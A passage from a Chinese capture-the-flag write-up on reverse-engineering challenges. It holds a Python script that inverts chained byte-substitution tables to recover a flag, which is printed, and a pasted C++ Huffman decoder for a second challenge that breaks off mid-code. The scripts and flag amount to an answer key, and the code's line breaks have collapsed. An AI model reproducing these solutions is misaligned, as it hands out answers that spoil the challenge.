0xEF, 0xCF, 0x51, 0x0E, 0xEC, 0x59, 0x5C, 0x37, 0xD5, 0x8E, 0x31, 0x34, 0x2D, 0x93, 0x25, 0x1C, 0xC8, 0x5B, 0x47, 0x9F, 0x03, 0x67, 0x7E, 0x42, 0x7D, 0x3A, 0xAA, 0x57, 0xDA, 0x9A, 0xAB, 0x74, 0x72, 0xE4, 0xB7, 0x5D, 0xCD, 0x87, 0x46, 0x2B, 0x43, 0xF3, 0xD0, 0x85, 0x55, 0xBB, 0xD4, 0xC6, 0x61, 0x56, 0x04, 0x65, 0x7C, 0x88, 0xC3, 0x73, 0xBC, 0xEB, 0xDD, 0x4D, 0xE0, 0xE6, 0xC0, 0x63, 0x8D, 0xF2, 0x81, 0xF6, 0xA8, 0x3D, 0x3F, 0xA4, 0xE9, 0x4A, 0xB5, 0xF0, 0xCA, 0x8B, 0x2C, 0xD7, 0xAC, 0xC5, 0xC1, 0xBF, 0x53, 0xD1, 0x6F, 0x06, 0xE7, 0xD6, 0x09, 0x95, 0x44, 0x71, 0xB9, 0x83, 0x4C, 0x22, 0xAF, 0xB4, 0x75, 0x36, 0x30, 0xCB, 0xEE, 0x91, 0x45, 0x8C, 0x4E, 0x6E, 0x6C, 0x4F, 0x84, 0xBA, 0xFF, 0x64, 0xB3, 0x60, 0xFB, 0xB0, 0x18, 0xD8, 0xDF, 0x3C, 0x68, 0xDC, 0x69]def Fun_0x17():for i in range(len(input)):for j in range(len(byte_423780)):if byte_423780[j] == input[i]:input[i] = jbreakbyte_423380 = [0x91, 0x67, 0x1A, 0xBE, 0xAB, 0xC2, 0x85, 0xD5, 0xDA, 0xCC, 0xF7, 0x5B, 0x54, 0x61, 0x05, 0xDF, 0x02, 0x70, 0x65, 0x69, 0x9A, 0x7A, 0x09, 0x92, 0x5D, 0x2A, 0xA7, 0x37, 0xFF, 0x19, 0xE6, 0x99, 0xF3, 0x1E, 0xBD, 0x82, 0x48, 0x3C, 0xE8, 0xC8, 0x66, 0x17, 0xB7, 0xA9, 0xC5, 0x4E, 0x33, 0x84, 0x45, 0xD3, 0x8B, 0x49, 0x50, 0x43, 0x8F, 0xCD, 0x73, 0x29, 0x04, 0xDC, 0x01, 0x0C, 0xDD, 0x2E, 0xFB, 0x6E, 0x0F, 0x24, 0x57, 0xE9, 0xC9, 0x7D, 0xB3, 0x40, 0x4B, 0x56, 0x6C, 0x68, 0xE2, 0x22, 0xF6, 0x80, 0xAA, 0x95, 0xD4, 0x97, 0x94, 0x21, 0x53, 0xD1, 0xE3, 0x59, 0xD2, 0xED, 0x41, 0x4D, 0x74, 0xA3, 0xA0, 0x32, 0x0D, 0xFC, 0x46, 0x34, 0xFA, 0xB1, 0x5E, 0xC6, 0x71, 0xC0, 0xE0, 0x3F, 0x13, 0x12, 0xD7, 0xEE, 0xF8, 0x26, 0xE1, 0x25, 0x88, 0x77, 0xB0, 0x8D, 0x6A, 0xEA, 0x0E, 0xD6, 0x3E, 0x03, 0x64, 0xBF, 0x8C, 0x96, 0xD9, 0xA4, 0x42, 0xAD, 0xFD, 0x16, 0x5A, 0xE4, 0x06, 0x9D, 0x07, 0x87, 0x5F, 0xAF, 0xDB, 0xC1, 0x93, 0x1C, 0xF1, 0xDE, 0xA6, 0x3A, 0xF4, 0x2C, 0x1B, 0x39, 0xE7, 0x4A, 0xC7, 0x35, 0xFE, 0x0A, 0x62, 0xF0, 0xCA, 0xEC, 0x27, 0x52, 0x23, 0x7F, 0xA5, 0x79, 0x7C, 0x75, 0x86, 0xEB, 0x60, 0xA8, 0xF5, 0x1F, 0x20, 0xC3, 0x63, 0x5C, 0x72, 0x18, 0xE5, 0x51, 0xAC, 0xB9, 0x90, 0x9F, 0x4C, 0xB2, 0xCB, 0x00, 0x6F, 0x28, 0xA1, 0xB6, 0x9B, 0xD0, 0x7B, 0x36, 0x4F, 0x9C, 0xCF, 0x98, 0x8A, 0x0B, 0x78, 0xB4, 0x7E, 0x2B, 0xEF, 0x58, 0xB5, 0xBA, 0x55, 0xB8, 0x10, 0x2F, 0x44, 0xAE, 0x89, 0x08, 0xC4, 0x3B, 0x9E, 0xF9, 0x6D, 0xF2, 0x15, 0x1D, 0x30, 0x47, 0x8E, 0x31, 0x2D, 0xD8, 0x6B, 0x3D, 0x11, 0x14, 0xA2, 0x83, 0xCE, 0xBB, 0x81, 0xBC, 0x76, 0x38]def Fun_0x13():for i in range(len(input)):for j in range(len(byte_423380)):if byte_423380[j] == input[i]:input[i] = jbreakbyte_423180 = [0xE8, 0x22, 0x64, 0x9F, 0xC5, 0xD5, 0x25, 0xC9, 0x5D, 0xDF, 0xA1, 0x74, 0xCB, 0x57, 0xF7, 0xF0, 0xBD, 0x56, 0xFF, 0x33, 0x79, 0xFE, 0x87, 0xB6, 0xB1, 0x54, 0x10, 0x95, 0x8A, 0xEC, 0x7B, 0x48, 0x84, 0x3D, 0x30, 0xEF, 0x86, 0xFA, 0x97, 0x1C, 0xDC, 0xA9, 0x5A, 0xF3, 0x67, 0x18, 0x83, 0x72, 0x06, 0xB9, 0xF5, 0x05, 0x68, 0x59, 0xF2, 0xE4, 0x88, 0x5E, 0x14, 0x17, 0x11, 0x9C, 0xAB, 0xDE, 0xEB, 0x7D, 0x62, 0x9B, 0xD6, 0xF4, 0x01, 0x29, 0xBC, 0xC0, 0x69, 0xA2, 0x2B, 0x0D, 0x1D, 0x98, 0x6A, 0xBE, 0x65, 0x09, 0xF8, 0x96, 0xB4, 0x6E, 0x63, 0xE3, 0x34, 0x2D, 0xCE, 0x0A, 0xCD, 0xAA, 0x21, 0xCC, 0xE7, 0xA5, 0xDB, 0xD8, 0x03, 0xDD, 0xB2, 0x1F, 0x9D, 0x9E, 0x0E, 0x8F, 0x8B, 0xCA, 0x92, 0x0B, 0xA7, 0x5B, 0xD2, 0xCF, 0x47, 0x07, 0x04, 0xAE, 0x3B, 0xA8, 0x7C, 0x73, 0xF9, 0x35, 0xEE, 0x7A, 0xB0, 0xBA, 0x85, 0x46, 0x3E, 0x81, 0xC7, 0x40, 0x37, 0x15, 0x3A, 0x19, 0xE0, 0x1E, 0x28, 0x4A, 0x4F, 0x8C, 0xD4, 0x51, 0x2E, 0x94, 0x89, 0x2A, 0x0F, 0x7E, 0xE1, 0xC8, 0x5F, 0x4E, 0x6D, 0xF6, 0x49, 0xB8, 0x55, 0x60, 0x82, 0x20, 0x36, 0xC1, 0x0C, 0x1B, 0xC4, 0x00, 0xE5, 0xA3, 0x2C, 0xE9, 0xC2, 0xF1, 0x23, 0x3F, 0xC3, 0xB5, 0x8D, 0xD7, 0x42, 0xFC, 0x50, 0x13, 0xBB, 0x61, 0x9A, 0x44, 0xE6, 0x91, 0x2F, 0x70, 0xC6, 0x6F, 0xD1, 0x27, 0x43, 0x08, 0xDA, 0xFD, 0x52, 0x71, 0x77, 0xED, 0xE2, 0xAD, 0x16, 0x8E, 0x12, 0x4C, 0x31, 0x3C, 0x39, 0x78, 0x90, 0xBF, 0x1A, 0x76, 0x75, 0x41, 0x99, 0xD0, 0x80, 0xB7, 0x66, 0x24, 0xD3, 0x7F, 0x4B, 0x45, 0x5C, 0x53, 0x4D, 0x26, 0x32, 0xA0, 0xFB, 0xB3, 0x38, 0x6B, 0xAF, 0xA6, 0xD9, 0x02, 0xA4, 0xEA, 0x6C, 0xAC, 0x58, 0x93]def Fun_0x11():for i in range(len(input)):for j in range(len(byte_423180)):if byte_423180[j] == input[i]:input[i] = jbreakbyte_422D80 = [0xB0, 0x28, 0x0B, 0x89, 0x4B, 0xA4, 0xBE, 0x1A, 0x8F, 0x6C, 0xCF, 0xB2, 0xB5, 0xFE, 0xFB, 0x59, 0x2D, 0x29, 0x39, 0x62, 0x97, 0xAA, 0xD7, 0x7D, 0x94, 0x2C, 0xFC, 0x5D, 0xB4, 0x7C, 0x8A, 0x82, 0xD3, 0xA7, 0xBA, 0xDF, 0x21, 0xE6, 0xA2, 0xD0, 0xE8, 0xF0, 0x67, 0x3A, 0xB9, 0x98, 0xF9, 0xAE, 0xD1, 0x56, 0xD8, 0xCA, 0x10, 0xEA, 0x92, 0xA8, 0x75, 0x7E, 0x65, 0xA9, 0xAF, 0x51, 0xC9, 0x8E, 0xD4, 0x77, 0xE4, 0x49, 0x06, 0x61, 0x9E, 0x24, 0xD9, 0x9B, 0x11, 0x05, 0x1D, 0x96, 0x9A, 0xB1, 0xE0, 0x83, 0xE1, 0x1C, 0xCD, 0xF3, 0x38, 0xB3, 0x57, 0x50, 0xF4, 0xAC, 0xEB, 0x14, 0xA5, 0x46, 0xF6, 0x93, 0xAD, 0x7B, 0x30, 0xEF, 0x79, 0x17, 0x47, 0xDA, 0xC0, 0xDD, 0xDE, 0xDC, 0x5A, 0x76, 0x3B, 0x31, 0x0D, 0x0E, 0x86, 0xF1, 0x71, 0xFA, 0x0C, 0x00, 0xA3, 0xBF, 0x64, 0x37, 0x22, 0xD2, 0x69, 0x5C, 0xC6, 0x16, 0x9F, 0x5E, 0x7A, 0x1E, 0x27, 0x60, 0x6E, 0xF8, 0x8C, 0xEE, 0xC2, 0x74, 0x81, 0x8B, 0x33, 0x03, 0xBD, 0x2A, 0x0A, 0x68, 0x6B, 0x3F, 0x4C, 0xC3, 0x15, 0x04, 0x3D, 0x63, 0xF5, 0xAB, 0xCC, 0x3C, 0x53, 0x20, 0x66, 0xC4, 0xC1, 0x23, 0xE7, 0x25, 0x55, 0xC7, 0xED, 0xB7, 0xBC, 0xCB, 0x8D, 0x09, 0xCE, 0x52, 0xBB, 0xE2, 0xC5, 0xB6, 0x26, 0x12, 0x2F, 0x99, 0x58, 0x40, 0x6D, 0xA1, 0x3E, 0x48, 0x85, 0xA6, 0xF2, 0x0F, 0x43, 0x78, 0xB8, 0x01, 0xE5, 0xD5, 0x6F, 0x4E, 0xF7, 0x13, 0x42, 0xEC, 0x45, 0x2B, 0x4F, 0x36, 0xDB, 0x9C, 0xE3, 0x44, 0x34, 0x84, 0x73, 0x2E, 0x7F, 0xFD, 0x91, 0x41, 0xD6, 0x95, 0x18, 0xFF, 0x70, 0xC8, 0x02, 0x5F, 0x08, 0x1B, 0x6A, 0x5B, 0x19, 0xA0, 0x4D, 0x35, 0x54, 0xE9, 0x32, 0x88, 0x72, 0x07, 0x87, 0x90, 0x4A, 0x80, 0x1F, 0x9D]def Fun_0xd():for i in range(len(input)):for j in range(len(byte_422D80)):if byte_422D80[j] == input[i]:input[i] = jbreakbyte_422B80 = [0x38, 0xD9, 0xDA, 0xE6, 0xB5, 0xF1, 0x0B, 0x93, 0x0C, 0x58, 0x0D, 0xAE, 0x0A, 0x85, 0x2A, 0x50, 0xC2, 0xBF, 0xD4, 0x28, 0x52, 0xC4, 0x4F, 0xE1, 0x44, 0xE0, 0xA2, 0x70, 0x36, 0x65, 0x4B, 0x41, 0x9D, 0x5F, 0x05, 0x7C, 0xF7, 0xD7, 0x99, 0x8B, 0xCC, 0xCE, 0x16, 0xBE, 0xB6, 0xC5, 0x8F, 0x79, 0xC7, 0x20, 0x7E, 0xF4, 0xF3, 0x2E, 0x4A, 0x89, 0xD6, 0x0F, 0x6E, 0xB0, 0x61, 0xB1, 0x6D, 0x19, 0x73, 0x03, 0x74, 0xA1, 0x40, 0xEC, 0xC0, 0x57, 0x94, 0x7A, 0x66, 0xD5, 0xEA, 0x17, 0x6A, 0x84, 0x37, 0xED, 0xF6, 0x13, 0x31, 0x5B, 0x82, 0x1E, 0xFC, 0x92, 0xE2, 0x42, 0x86, 0xBA, 0xE3, 0x91, 0x7F, 0x67, 0x5C, 0x98, 0x15, 0x22, 0x8D, 0x80, 0x04, 0xE4, 0x25, 0x09, 0xA0, 0xAD, 0x63, 0xE5, 0xB4, 0x9A, 0x3C, 0xA3, 0x3A, 0x69, 0xF8, 0xCD, 0xBC, 0x88, 0x55, 0xB2, 0xBD, 0x6B, 0x77, 0x71, 0xB3, 0xD3, 0x90, 0x75, 0x06, 0x49, 0xC3, 0x32, 0x4D, 0x1D, 0xA8, 0xAA, 0xFB, 0x7B, 0x7D, 0x2B, 0xA6, 0x34, 0x72, 0x47, 0xF0, 0x2F, 0x9C, 0x08, 0x00, 0x14, 0x8C, 0x26, 0x5E, 0x87, 0xD1, 0xCF, 0xC9, 0x18, 0x51, 0x23, 0xCB, 0xF5, 0x1C, 0x9F, 0x97, 0xF9, 0xBB, 0xA7, 0x39, 0x45, 0x02, 0xFD, 0x46, 0x8A, 0x54, 0xA4, 0x8E, 0x9E, 0x68, 0x96, 0x0E, 0x78, 0xB8, 0x3D, 0x11, 0x64, 0xAF, 0x10, 0xDE, 0x6C, 0x60, 0x5A, 0x76, 0x1A, 0xE9, 0xC1, 0x3E, 0xCA, 0x9B, 0x27, 0x30, 0xEF, 0xFF, 0x07, 0xD2, 0xB9, 0x2D, 0xD0, 0xEE, 0x83, 0xAB, 0xF2, 0x4C, 0xA5, 0x21, 0x62, 0x81, 0x33, 0x1B, 0xD8, 0x6F, 0xAC, 0x3B, 0x5D, 0xE8, 0xFA, 0x3F, 0xDB, 0x95, 0xE7, 0x59, 0x12, 0x48, 0x35, 0xC6, 0x2C, 0x4E, 0x01, 0xDD, 0x43, 0x29, 0xDC, 0x24, 0x1F, 0xB7, 0xA9, 0xEB, 0xC8, 0xFE, 0x56, 0xDF, 0x53]def Fun_0xb():for i in range(len(input)):for j in range(len(byte_422B80)):if byte_422B80[j] == input[i]:input[i] = jbreakbyte_422780 = [0x0F, 0xA5, 0xBA, 0x03, 0xF9, 0x69, 0x2A, 0xD7, 0xEA, 0xB5, 0xFC, 0xA1, 0x39, 0x20, 0x68, 0x72, 0x25, 0xB2, 0x6C, 0xAD, 0x88, 0x51, 0x73, 0xEB, 0xCF, 0x13, 0xDE, 0x7C, 0x6D, 0x38, 0x05, 0x09, 0xC2, 0x96, 0x1F, 0x7F, 0x37, 0x4A, 0xC9, 0xE7, 0x6A, 0xB0, 0x59, 0xF7, 0xD2, 0xB9, 0x16, 0xC8, 0xEE, 0xA9, 0x18, 0x80, 0xAC, 0xE3, 0x9E, 0x6F, 0x3C, 0x2F, 0x3E, 0x9A, 0xBE, 0x1D, 0xB4, 0x7B, 0x7D, 0x32, 0x6B, 0x74, 0xC5, 0xC0, 0xC7, 0xD1, 0x29, 0x98, 0xDD, 0xB6, 0x0E, 0x4D, 0xBF, 0x79, 0x0D, 0xDA, 0x7A, 0x17, 0x71, 0x43, 0x87, 0xFF, 0xDC, 0xC6, 0x12, 0xE9, 0x67, 0x2D, 0x70, 0x9F, 0x95, 0x30, 0x26, 0x24, 0x2B, 0xA8, 0xA2, 0xD8, 0x3B, 0x31, 0xA0, 0x3D, 0x4B, 0x90, 0x60, 0x34, 0x75, 0xE8, 0x5D, 0xF4, 0x85, 0xF3, 0xFE, 0x35, 0xCB, 0xB8, 0x02, 0x50, 0xB1, 0xF1, 0x1A, 0x1B, 0x21, 0xCD, 0xC4, 0x7E, 0xED, 0x07, 0xD9, 0xD6, 0x44, 0x15, 0x8E, 0x49, 0xB3, 0x97, 0xE6, 0x63, 0xB7, 0xEF, 0x3A, 0x8F, 0xF2, 0x53, 0x10, 0x77, 0x86, 0xF8, 0x8A, 0x28, 0x3F, 0xD4, 0x4C, 0xE5, 0x82, 0x83, 0xEC, 0x62, 0x89, 0xDF, 0xC3, 0x14, 0xCA, 0xA3, 0x5F, 0x64, 0x47, 0xFD, 0x00, 0x84, 0x66, 0xA7, 0x5A, 0x0C, 0x01, 0xD5, 0x5B, 0x0A, 0x4F, 0x27, 0x78, 0x0B, 0x2E, 0x48, 0x36, 0xFA, 0x08, 0x56, 0xE0, 0xA6, 0xC1, 0x5C, 0x8B, 0x41, 0x06, 0xBB, 0x52, 0x93, 0xAF, 0x2C, 0x5E, 0xF6, 0x61, 0xF0, 0xAB, 0x91, 0x45, 0x04, 0xBD, 0xCC, 0xE4, 0x65, 0x9D, 0x92, 0xCE, 0x40, 0xAE, 0x76, 0x9B, 0x9C, 0xAA, 0x54, 0xD0, 0x1C, 0x81, 0x4E, 0x57, 0x55, 0x23, 0x6E, 0x1E, 0x99, 0xDB, 0xFB, 0xA4, 0x22, 0x19, 0x58, 0x11, 0x8D, 0x94, 0xD3, 0xE2, 0x8C, 0xF5, 0x42, 0x46, 0xBC, 0x33, 0xE1]def Fun_0x7():for i in range(len(input)):for j in range(len(byte_422780)):if byte_422780[j] == input[i]:input[i] = jbreakbyte_422580 = [0x00, 0x74, 0x59, 0xC6, 0xAC, 0xD3, 0xC1, 0xA0, 0x88, 0x3F, 0x1C, 0x28, 0x17, 0x22, 0xC5, 0x38, 0xF9, 0x1B, 0x21, 0x49, 0x99, 0xAF, 0xD6, 0x95, 0xA4, 0x9D, 0x5D, 0x5B, 0x73, 0xFE, 0xC9, 0x9A, 0x4C, 0xB4, 0x27, 0x5E, 0x71, 0x25, 0xE2, 0x90, 0xC0, 0x62, 0x5F, 0x48, 0x77, 0xE0, 0xF2, 0x8E, 0x40, 0xC7, 0x79, 0x1A, 0xDC, 0xF3, 0x01, 0xB6, 0xD8, 0xB5, 0x67, 0x1E, 0x85, 0x12, 0x68, 0x87, 0xD0, 0x30, 0xEB, 0x2F, 0x50, 0xCF, 0xEE, 0xDD, 0xFB, 0xE6, 0xA5, 0x69, 0x05, 0x75, 0xB7, 0xEF, 0x70, 0x53, 0xFF, 0xBA, 0x80, 0x41, 0x9B, 0xA1, 0x39, 0xF8, 0x65, 0x1F, 0x7A, 0x51, 0x98, 0xAD, 0x02, 0x13, 0x18, 0xC3, 0x31, 0x89, 0xCD, 0xCA, 0x91, 0xD1, 0x78, 0x57, 0x47, 0xB8, 0x54, 0x9F, 0x96, 0x04, 0x23, 0x2B, 0xE5, 0x46, 0x29, 0x7C, 0x76, 0x82, 0xBC, 0xFC, 0x6E, 0xEC, 0xED, 0x64, 0x4A, 0x26, 0x34, 0x5C, 0x19, 0x55, 0xFD, 0x6D, 0xFA, 0x7E, 0xB2, 0xD4, 0xF1, 0xF6, 0xE4, 0x60, 0xB0, 0x52, 0x9E, 0x8F, 0xBB, 0x08, 0x3B, 0x97, 0xE8, 0x10, 0x6C, 0x44, 0x3A, 0x36, 0x35, 0x03, 0xC4, 0x81, 0x9C, 0xAB, 0xCB, 0x66, 0xAA, 0x37, 0xA2, 0xD2, 0xE1, 0xE9, 0x7B, 0x14, 0x8D, 0xD9, 0xF5, 0x0B, 0xC2, 0x07, 0xA8, 0x0D, 0xA3, 0x0A, 0x84, 0x6B, 0x2C, 0xEA, 0x0C, 0xAE, 0x7D, 0x6F, 0xD7, 0xE7, 0xC8, 0x3C, 0x45, 0xCC, 0x58, 0xB9, 0x3D, 0x33, 0x4E, 0x4B, 0x8C, 0xCE, 0x72, 0x6A, 0x8B, 0x2D, 0x24, 0x11, 0xDF, 0x5A, 0x2E, 0x92, 0xDA, 0x86, 0x94, 0xA7, 0xD5, 0x4F, 0x2A, 0xB3, 0x63, 0x61, 0xE3, 0xDE, 0x43, 0x1D, 0xBF, 0x15, 0x32, 0xBE, 0x16, 0x3E, 0x93, 0x7F, 0x83, 0x56, 0x06, 0xF7, 0x8A, 0x20, 0xBD, 0x0E, 0xA6, 0xDB, 0x0F, 0xB1, 0x42, 0xF0, 0x09, 0x4D, 0xA9, 0xF4]def Fun_0x5():for i in range(len(input)):for j in range(len(byte_422580)):if byte_422580[j] == input[i]:input[i] = jbreakbyte_422380 = [0x45, 0x1F, 0x63, 0x81, 0xE6, 0xAD, 0x4F, 0xD3, 0xC0, 0x15, 0x69, 0x8F, 0x0D, 0x31, 0x0C, 0xB0, 0xF1, 0x2E, 0x98, 0xC1, 0xC2, 0x96, 0xB2, 0xEB, 0xBF, 0xDF, 0x17, 0xF4, 0x7F, 0xE5, 0x66, 0x73, 0xD8, 0x56, 0x46, 0x20, 0x9C, 0x77, 0x3D, 0x72, 0xA3, 0x91, 0x49, 0x68, 0x4C, 0x1E, 0xAE, 0x06, 0x7A, 0x94, 0xDD, 0x52, 0x55, 0x2C, 0xB8, 0x42, 0x79, 0xFE, 0x38, 0xEF, 0x8B, 0xF7, 0xAC, 0xDC, 0xFF, 0x78, 0x34, 0x70, 0xA9, 0xCE, 0x3F, 0x0E, 0x11, 0x43, 0x5B, 0xF8, 0xAF, 0xD0, 0xFA, 0x33, 0xBA, 0xCF, 0x4A, 0xC9, 0x88, 0x4E, 0x80, 0x10, 0x85, 0x37, 0x12, 0xAB, 0xE1, 0x61, 0xB7, 0x3E, 0x4D, 0x19, 0x3A, 0x04, 0x8C, 0x92, 0x0B, 0xE7, 0x3C, 0xEA, 0xC7, 0x16, 0x35, 0xB1, 0xA7, 0x8E, 0x40, 0x9F, 0xB6, 0xB5, 0x25, 0xA0, 0x5A, 0x30, 0x7D, 0xA2, 0x1A, 0x64, 0xC5, 0x6D, 0x74, 0x82, 0x08, 0x7E, 0xD2, 0xF6, 0xAA, 0xDA, 0xED, 0x4B, 0x6E, 0xE8, 0xE9, 0xE2, 0xD4, 0x71, 0xB9, 0x09, 0x84, 0x3B, 0xC4, 0x1C, 0x60, 0xFD, 0x22, 0x99, 0x39, 0x97, 0x18, 0x89, 0x7C, 0xA4, 0x27, 0xBD, 0x0F, 0xCC, 0x95, 0xF5, 0xB3, 0x65, 0x6B, 0x8A, 0x58, 0x36, 0xBB, 0x9E, 0x75, 0xD1, 0x03, 0x9D, 0x6A, 0x6C, 0x53, 0x05, 0xB4, 0xE4, 0xEE, 0x67, 0x87, 0x7B, 0x32, 0x2D, 0x24, 0x2A, 0x59, 0xEC, 0x0A, 0xDB, 0x21, 0x07, 0x23, 0x50, 0x02, 0x41, 0xF2, 0x83, 0xD9, 0x26, 0xBC, 0x6F, 0x86, 0xA6, 0x93, 0xF9, 0xC8, 0xD6, 0xA5, 0x1D, 0xE3, 0xE0, 0xFC, 0xCA, 0x1B, 0x5E, 0x8D, 0x2F, 0x5C, 0xBE, 0x47, 0xA8, 0x44, 0x57, 0x54, 0x48, 0xC3, 0x00, 0x62, 0x5D, 0xCB, 0xD7, 0x76, 0xCD, 0x28, 0xD5, 0x14, 0x90, 0x13, 0xDE, 0x5F, 0xF0, 0x01, 0x2B, 0xC6, 0x29, 0x9A, 0x9B, 0x51, 0xF3, 0xFB, 0xA1]def Fun_0x3():for i in range(len(input)):for j in range(len(byte_422380)):if byte_422380[j] == input[i]:input[i] = jbreakbyte_422280 = [0x7A, 0x91, 0x9F, 0x23, 0x71, 0xD1, 0x63, 0xDB, 0x59, 0x0A, 0xEC, 0x69, 0xEE, 0x76, 0x5D, 0x64, 0x37, 0x42, 0x8C, 0x0B, 0x3C, 0x5C, 0x80, 0xAD, 0x6A, 0x03, 0x43, 0x93, 0xBC, 0xBF, 0xE3, 0xAF, 0x5A, 0x8A, 0x65, 0x0D, 0x31, 0xDF, 0x3E, 0xA7, 0xE4, 0xDD, 0xB4, 0xB0, 0x56, 0x1C, 0x12, 0xA4, 0x9E, 0xD8, 0x3D, 0x81, 0x60, 0x9A, 0xCB, 0xFA, 0xB1, 0xE0, 0xD3, 0xF4, 0xA2, 0x26, 0x68, 0x90, 0x4B, 0x45, 0x85, 0x20, 0x16, 0xDE, 0xED, 0x4C, 0x6F, 0x34, 0xDC, 0xBE, 0xD2, 0x46, 0x33, 0x14, 0x77, 0xC6, 0xCD, 0xF0, 0xC5, 0xAC, 0x1F, 0xD0, 0x95, 0x97, 0x3F, 0xD7, 0x52, 0xAE, 0xB9, 0xC9, 0x0C, 0xCA, 0x4E, 0xF1, 0xB7, 0x39, 0x7F, 0x27, 0x2B, 0x40, 0x4A, 0x51, 0xA1, 0xCC, 0xCE, 0x6E, 0x70, 0xFF, 0x0E, 0xEF, 0x8E, 0x25, 0xB3, 0x5E, 0x6C, 0xAB, 0x02, 0x49, 0xE9, 0x9B, 0x36, 0x13, 0x9C, 0x04, 0x35, 0xC0, 0xFB, 0x3A, 0x67, 0xB6, 0x9D, 0xC2, 0x73, 0xB5, 0x6D, 0xCF, 0x83, 0x2C, 0x01, 0xC1, 0x10, 0x6B, 0x79, 0x87, 0x5B, 0x57, 0x47, 0xE5, 0x15, 0xF7, 0xA5, 0x74, 0xAA, 0x53, 0x7D, 0x2E, 0xD5, 0xA3, 0x19, 0xF5, 0x2D, 0xFD, 0x61, 0x8D, 0xC8, 0x1B, 0xC3, 0xDA, 0xF6, 0x72, 0x54, 0x5F, 0x1E, 0xE8, 0x17, 0x50, 0xB2, 0xE7, 0x0F, 0x7E, 0x55, 0xBD, 0x86, 0x00, 0x78, 0x94, 0x92, 0x09, 0x2F, 0xD6, 0xD9, 0xF3, 0x29, 0xE6, 0x24, 0x32, 0x66, 0x22, 0x41, 0xC4, 0x7C, 0x05, 0x98, 0x44, 0x4F, 0x99, 0xA9, 0xE1, 0x8F, 0x08, 0x1A, 0x2A, 0x11, 0xEA, 0x3B, 0xE2, 0x38, 0xB8, 0x18, 0xF9, 0xD4, 0xC7, 0x62, 0x7B, 0x75, 0x58, 0x96, 0x28, 0xEB, 0x06, 0x84, 0x89, 0x48, 0x82, 0x88, 0xA6, 0xFE, 0xA0, 0xF2, 0xF8, 0x1D, 0x8B, 0xFC, 0xA8, 0x21, 0x30, 0xBB, 0x07, 0xBA, 0x4D]def Fun_0x2():for i in range(len(input)):for j in range(len(byte_422280)):if byte_422280[j] == input[i]:input[i] = jbreakFun_0x1d()Fun_0x17()Fun_0x13()Fun_0x11()Fun_0xd()Fun_0xb()Fun_0x7()Fun_0x5()Fun_0x3()Fun_0x2()for i in range(len(input)):print(chr(input[i]),end = "")
最后的flag即为:
#y0u_4r3_7h3_m4573r_0f_r3v3r51n6_!
3
BadSecret
赛后10分钟出的,第二题浪费了太多时间 0-0
c++编写的程序,代码太臭了,根本无从下手
通过黑盒测试,猜测出这个字符串是哈夫曼编码后的结果
再次尝试调试无果后,注意到这句话:
搜了手字符串:
得到
[Char:'h' Frequency: 7] [Char:'a' Frequency: 6] [Char:'y' Frequency: 5] [Char:'c' Frequency: 4] [Char:'u' Frequency: 3] [Char:'m' Frequency: 2] [Char:'d' Frequency: 1]给出了频率,哈夫曼解码的现成代码解码
exp:
using namespace std;const int INF = 1000000000;const int maxBit = 1 << 5;const int maxNode = 1 << 10;const int maxCode = 1 << 10;// 节点信息结构struct Node {// 值string value;// 权值float weight;// 父节点int parent;// 左子节点int lchild;// 右子节点int rchild;};// 编码信息结构struct Code {// 编码字符int bit[maxBit];// 开始位置int start;// 值string value;};// 节点数组Node huffman[maxNode];// 编码数组Code huffmanCode[maxCode];// n个字符串int n;// 初始化Huffman树void initHuffmanTree() {for(int i = 0; i < (2 * n) - 1; i++) {huffman[i].weight = 0;huffman[i].value = "";huffman[i].parent = -1;huffman[i].lchild = -1;huffman[i].rchild = -1;}}// 贪心法// 构造Huffman树void huffmanTree() {// 循环构建Huffman树for(int i = 0; i < n - 1; i++) {// m1,m2存放所有节点中权值最小的两个节点权值int m1 = INF;int m2 = INF;// x1,x2存放所有节点中权值最小的两个节点下标int x1 = 0;int x2 = 0;for(int j = 0; j < n + i; j++) {if(huffman[j].weight < m1 && huffman[j].parent == -1) {m2 = m1;x2 = x1;m1 = huffman[j].weight;x1 = j;} else if(huffman[j].weight < m2 && huffman[j].parent == -1) {m2 = huffman[j].weight;x2 = j;}}// 设置找到的两个节点的x1,x2的父节点信息huffman[x1].parent = n + i;huffman[x2].parent = n + i;huffman[n + i].weight = huffman[x1].weight + huffman[x2].weight;huffman[n + i].lchild = x1;huffman[n + i].rchild = x2;}}// huffman编码void huffmanEncoding() {// 临时结构Code cd;int child, parent;for(int i = 0; i < n; i++) {cd.value = huffman[i].value;cd.start = n - 1;child = i;parent = huffman[child].parent;// 未到根节点while(parent != -1) {// 左孩子if(huffman[parent].lchild == child) {cd.bit[cd.start] = 0;} else {// 右孩子cd.bit[cd.start] = 1;}cd.start--;// 设置下一循环条件child = parent;parent = huffman[child].parent;}// 保存求出的每个叶子节点的Huffman编码结构for(int j = cd.start + 1; j < n; j++) {huffmanCode[i].bit[j] = cd.bit[j];}huffmanCode[i].start = cd.start;huffmanCode[i].value = cd.value;}}// 打印每个叶节点的Huffman编码和编码起始值void printHuffmanCode() {for(int i = 0; i < n; i++) {cout << "第" << i + 1 << "个字符 " << huffmanCode[i].value << " 的Huffman编码为:";for(int j = huffmanCode[i].start + 1; j < n; j++) {cout << huffmanCode[i].bit[j];}cout << " 编码起始值为:" << huffmanCode[i].start << endl;}cout << endl;}// 解码Huffman编码void HuffmanDecoding(string s) {vector<string> v;// 标识位int ok = 1;for(int i = 0; i < s.length();) {// 根节点int x = (2 * n) - 1 - 1;// 不为叶子节点while(huffman[x].lchild != -1 && huffman[x].rchild != -1) {// 左子树if(s[i] == '0') {x = huffman[x].lchild;} else {// 右子树x = huffman[x].rchild;}i++;// 处理0,1序列有误// 这种情况一般是结尾0,1序列少了,导致最后一个字符串解码失败if(i == s.length() && huffman[x].lchild != -1) {ok = 0;break;}}if(ok) {v.push_back(huffman[x].value);}}if(ok) {for(int i = 0; i < v.size(); i++) {cout << v[i];}cout << endl << endl;} else {cout << "解码有误。" << endl << endl;}}int main() {while(true) {// 初始化// 输入数据cout << "请输入字符串个数(0退出):";cin >> n;if(!n) {break;}// 初始化Huffman树initHuffmanTree();for(int i = 0; i < n; i++) {cout << "一共" << n << "个字符串,请输入第" << i + 1 << "个字符串及其权值:";cin >> huffman[i].value;cin >> huffman[i].weight;}// 构造Huffman树huffmanTree();// huffman编码huffmanEncoding();// 打印每个叶节点的Huffman编码和编码起始值printHuffmanCode();while(true) {cout << "请输入一段符合上述编码的0,1序列(q进入下一次编码解码):";string s;cin >> s;if(s[0] == 'q') {cout << endl;break;}cout << "原始0,1序列为:" << s << endl;cout << "解码后为:";// 